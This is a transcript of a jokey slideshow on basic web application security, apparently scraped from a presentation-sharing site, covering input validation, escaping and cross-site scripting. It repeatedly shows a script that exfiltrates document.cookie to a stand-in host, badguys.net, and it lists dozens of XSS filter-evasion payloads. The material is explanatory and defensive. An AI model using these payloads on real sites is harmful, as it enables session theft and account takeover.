Basic web application security
Download
1 / 65

Basic Web Application Security - PowerPoint PPT Presentation


  • 58 Views
  • Uploaded on

Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. <script>alert(‘ loldongs ’)</script>. Filtering. Destructive. (One-Way Street).

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' Basic Web Application Security' - lyneth


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Basic web application security

Basic WebApplicationSecurity




Three ways

Three Ways

(All Awesome)



Passive

Passive

(No touchy-touchy)




This is really not a number
This is really not a Number.

<script>alert(‘loldongs’)</script>



Destructive

Destructive

(One-Way Street)







White listing usability problems

What happens when

you screw it up?

White-Listing  Usability Problems

Black-Listing  SecurityProblems

(Always a trade-off.)



Transport

Transport

Point A  Point B



Different media different escaping

Different Media,Different Escaping


HTML

<b>Huh.</b>

<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>

<b>Huh</b>


SQL

Sam O’Brien

INSERT INTO mah_peeps (name)

VALUES (‘Sam O\’Brien‘);

1, Sam O’Brien, 2010-09-02 18:30:00


XSS

(Cross-Site Scripting)


SS

(XTREME Site Scripting)


Sticking scripts where they don t belong

Sticking Scripts Where They Don’t Belong.

You there, down the back.

Stop sniggering.


Script alert hacked by loldongs script

<script>alert(‘HACKED BY LOLDONGS’)</script>

Amateurs!


Script alert document cookie script

<script>alert(document.cookie)</script>

Hmm.


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oh shit.


Why is this uncool

Why is this uncool?

(Yeah! Why?)


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Ooooh shit.


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oooooooooooh shit.


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oooooooooooooooooh shit.


Why is this really uncool

Why is this really uncool?

(Because shut up.)


HTTP

Hyper-Text Thingy I-forgot-again




It can guess badly

It can guess.(Badly.)

IP Address

Browser User-Agent


Sends a cookie with each request

Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every request.)


The server puts a unique id in the basket

The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1


Browser sends the id every request

Browser sends the ID every request.

PHPSESSID=123your456mum789


<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Look again.


They have your cookie

THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-



HTML

Validation Really Hard.


HTML

Filtering Still Really Hard.

  • Use a library,eg. HTML Purifier.


HTML

Escaping Dead Easy.

  • Most languages have stuff to handle this, eg.

  • htmlentities(), cgi.escape(), CGI.escape()


How hard is filtering

How hard is filtering?

(It’s just <script>, right?)


This hard
THIS HARD.

<IMG SRC=javascript:alert('a')>

<imgsrc=javascript:alert(&quot;a&quot;)>

<img “””><script>alert('a')</script>”>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;

&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;

&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72

&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72

&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('a');“>

<IMG SRC="jav&#x09;as&#x09cript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<imgonmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<imgsrc=”javascript:alert('a')”

  • (Well, then.)


This hard1
THIS HARD.

<iframesrc=http://foo/x.html <

<body background=”javascript:alert('a')”>

<BODY ONLOAD=alert('a')>

<imgdynsrc=”javascript:alert('a')”>

<imglowsrc=”javascript:alert('a')”>

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE=”&{alert('a')}”>

<LAYER SRC=”http://foo/x.html”></LAYER>

<link rel=”stylesheet” href=”javascript:alert('a');”>

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox(“a”)'>

<imgsrc=”livescript:alert('a')”>

žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)

<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert('a');”>

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,

PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

  • (Well, then.)


This hard2
THIS HARD.

<DIV STYLE="background-image: url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a

\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061

\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg=="

type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

  • (Well, then.)



Remember script alert script

Remember <script>alert()</script>?

(Yes, I do. Shut up.)




Do you have any javascript functions your site uses to do anything useful

Do you have any javascript functions your site uses to do anything useful?

(... Yes.)



That injected code can trigger forms run javascript functions or make ajax calls

That injected code can trigger forms, run javascript functions, or make AJAX calls.

(... Oooooh.)


Send someone to a link that looks like http my site user script dostuff script

Send someone to a link that looks like:http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)


Or store something that will output this on someone s profile page script dostuff script

Or store something that will output this on someone’s profile page:<script>doStuff();</script>

(... Oooooooooooooooh.)


And you re hosed

... And you’re hosed. profile page:

(Shit.)


The human element

The Human Element profile page:

Touchy-Feely Commie Bullshit.


a profile page:

Touchy-Feely Commie Bullshit.


ad